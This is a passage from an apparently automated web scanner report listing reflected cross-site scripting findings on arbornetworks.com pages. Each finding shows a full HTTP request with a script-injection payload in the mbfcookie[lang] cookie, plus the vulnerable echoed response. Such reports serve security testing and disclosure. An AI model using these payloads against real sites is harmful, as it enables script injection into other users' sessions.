Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=76e10529127394c687709c1a2755ca13; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:52 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en56a91\"><script>alert(1)</script>4a8a421a526">
...[SNIP]...

3.122. http://www.arbornetworks.com/cn/865.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/865.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7177"><script>alert(1)</script>7651ebbe8e8 was submitted in the mbfcookie[lang] cookie. This input was echoed as a7177\"><script>alert(1)</script>7651ebbe8e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cn/865.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ena7177"><script>alert(1)</script>7651ebbe8e8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=daccb31a391d41d40e6cb15ef14d3825; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Thu, 03-Feb-2011 23:58:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ena7177\"><script>alert(1)</script>7651ebbe8e8">
...[SNIP]...

3.123. http://www.arbornetworks.com/cn/infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cn/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eaab4"><script>alert(1)</script>d4517558dd0 was submitted in the mbfcookie[lang] cookie. This input was echoed as eaab4\"><script>alert(1)</script>d4517558dd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cn/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=eneaab4"><script>alert(1)</script>d4517558dd0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d36c06ec55280b565d88ed244268fbfa; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:25 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:25 GMT; path=/
Set-Cookie: mbfcookie[lang]=cn; expires=Fri, 04-Feb-2011 00:05:26 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:35 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="eneaab4\"><script>alert(1)</script>d4517558dd0">
...[SNIP]...

3.124. http://www.arbornetworks.com/contact [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /contact

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce73"><script>alert(1)</script>78e956c9366 was submitted in the mbfcookie[lang] cookie. This input was echoed as bce73\"><script>alert(1)</script>78e956c9366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /contact HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enbce73"><script>alert(1)</script>78e956c9366; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=3f377e4835493783b636581d8d915ac7; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:04:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:04:21 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbce73\"><script>alert(1)</script>78e956c9366">
...[SNIP]...

3.125. http://www.arbornetworks.com/de/5.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/5.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a345"><script>alert(1)</script>86899845244 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6a345\"><script>alert(1)</script>86899845244 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /de/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6a345"><script>alert(1)</script>86899845244; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=a0c071500549d1e94ca519f8921d0c9e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:48 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:48 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Thu, 03-Feb-2011 23:57:49 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:49 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en6a345\"><script>alert(1)</script>86899845244">
...[SNIP]...

3.126. http://www.arbornetworks.com/de/infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /de/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c53b"><script>alert(1)</script>f0a1f66cb8a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c53b\"><script>alert(1)</script>f0a1f66cb8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /de/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4c53b"><script>alert(1)</script>f0a1f66cb8a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ded35de59f9cde52854e6194ae0b18e8; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=de; expires=Fri, 04-Feb-2011 00:05:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:26 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en4c53b\"><script>alert(1)</script>f0a1f66cb8a">
...[SNIP]...

3.127. http://www.arbornetworks.com/deeppacketinspection [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /deeppacketinspection

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b5ce"><script>alert(1)</script>46a86177217 was submitted in the mbfcookie[lang] cookie. This input was echoed as 5b5ce\"><script>alert(1)</script>46a86177217 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deeppacketinspection HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5b5ce"><script>alert(1)</script>46a86177217; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2eebbcb6ceb0e47bc26620dac1e8ac4b; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:01:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:01:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:01:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:01:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en5b5ce\"><script>alert(1)</script>46a86177217">
...[SNIP]...

3.128. http://www.arbornetworks.com/en/9.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/9.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ad11"><script>alert(1)</script>45c595a351a was submitted in the mbfcookie[lang] cookie. This input was echoed as 4ad11\"><script>alert(1)</script>45c595a351a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/9.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4ad11"><script>alert(1)</script>45c595a351a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2f90ebf3f79c56732a249f6b42e46a68; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:55:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en4ad11\"><script>alert(1)</script>45c595a351a">
...[SNIP]...

3.129. http://www.arbornetworks.com/en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0de3"><script>alert(1)</script>c78fdd82d6c was submitted in the mbfcookie[lang] cookie. This input was echoed as e0de3\"><script>alert(1)</script>c78fdd82d6c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/about-arbor-networks-a-leader-in-network-monitoring-and-security-solutions.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene0de3"><script>alert(1)</script>c78fdd82d6c; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:07 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=27009310fb8993a60206523b612c1753; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:08 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:08 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:09 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:09 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene0de3\"><script>alert(1)</script>c78fdd82d6c">
...[SNIP]...

3.130. http://www.arbornetworks.com/en/arbor-in-action-global-network-security-solution-resources.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-in-action-global-network-security-solution-resources.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61438"><script>alert(1)</script>bf6eef2e4a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as 61438\"><script>alert(1)</script>bf6eef2e4a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-in-action-global-network-security-solution-resources.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en61438"><script>alert(1)</script>bf6eef2e4a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d3554e8c89ab697c33ada74e025444df; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:16 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:16 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:17 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en61438\"><script>alert(1)</script>bf6eef2e4a3">
...[SNIP]...

3.131. http://www.arbornetworks.com/en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2791d"><script>alert(1)</script>a9d0e26d8e0 was submitted in the mbfcookie[lang] cookie. This input was echoed as 2791d\"><script>alert(1)</script>a9d0e26d8e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/arbor-networks-sixth-annual-worldwide-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en2791d"><script>alert(1)</script>a9d0e26d8e0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=393079ea34c82ec326ef11037b6f5423; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:57 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:57 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:58 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:59 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en2791d\"><script>alert(1)</script>a9d0e26d8e0">
...[SNIP]...

3.132. http://www.arbornetworks.com/en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/arbor-powers-continent-8-technologies-ddos-mitigation-service.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d75d"><script>alert(1)</script>8224aca7549 was submitted in the mbfcookie[lang] cookie. This input was echoed as 3d75d\"><script>alert(1)</script>8224aca7549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

